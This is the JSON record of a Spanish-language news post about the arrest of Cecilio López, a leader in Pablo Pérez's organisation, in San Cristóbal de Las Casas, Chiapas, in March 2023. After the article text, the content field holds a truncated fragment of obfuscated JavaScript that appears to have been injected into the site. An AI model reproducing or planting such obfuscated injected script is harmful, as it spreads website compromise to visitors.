{"id":9308,"date":"2023-03-31T03:45:52","date_gmt":"2023-03-31T03:45:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9308"},"modified":"2023-03-31T03:45:52","modified_gmt":"2023-03-31T03:45:52","slug":"detienen-a-cecilio-lopez-lider-segundo-de-pablo-perez-del-pinar","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9308","title":{"rendered":"Detienen a Cecilio L\u00f3pez, l\u00edder segundo de Pablo P\u00e9rez del Pinar"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"450\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.47.31-PM-1024x450.jpeg\" alt=\"\" class=\"wp-image-9309\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.47.31-PM-1024x450.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.47.31-PM-300x132.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.47.31-PM-768x337.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-30-at-2.47.31-PM.jpeg 1156w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> \u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>30 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Elementos de la Fiscal\u00eda de Justicia de Chiapas, provenientes de Tuxtla Guti\u00e9rrez ejecutaron orden de aprehensi\u00f3n en contra de Cecilio L\u00f3pez, elemento segundo de la Organizaci\u00f3n que presid\u00eda Pablo P\u00e9rez S\u00e1ntiz, detenido detenido el 28 de octubre por homicidio calificado cometido el 3 de febrero del 2021 en contra de una persona de nombre Mateo \u201cN\u201d. De acuerdo a las versiones extraoficiales, se sabe que Cecilio L\u00f3pez, ven\u00eda del municipio de Teopisca al parecer de una reuni\u00f3n de la Organizaci\u00f3n, sin embargo en el conocido crucero de San Pablo, regresando de Teopisca, esto por elementos de la fiscal\u00eda de Tuxtla Guti\u00e9rrez, y llevado directamente a El Amate, esto alrededor de las 13:00 horas. Aunque se ignora el delito por el que es acusado, se sabe que Cecilio, ha encabezado diversas movilizaciones en busca de la liberaci\u00f3n de Pablo P\u00e9rez.Se sabe que despu\u00e9s de la detenci\u00f3n, en diversos puntos, se comenzaron a concentrar a personas en motocicletas, por lo que miembros del Ej\u00e9rcito y Guardia Nacional, montaron operativo en diversos puntos de la ciudad, adem\u00e1s del sobrevuelo de un helic\u00f3ptero.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 30 de Marzo del 2023. San Crist\u00f3bal de Las Casas.- Elementos de la Fiscal\u00eda de Justicia de Chiapas, provenientes de Tuxtla Guti\u00e9rrez ejecutaron orden de aprehensi\u00f3n en contra de Cecilio L\u00f3pez, elemento segundo de la Organizaci\u00f3n que presid\u00eda Pablo P\u00e9rez S\u00e1ntiz, detenido detenido el 28 de octubre por homicidio calificado cometido el 3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9309,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9308","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9308"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions"}],"predecessor-version":[{"id":9310,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9308\/revisions\/9310"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9309"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}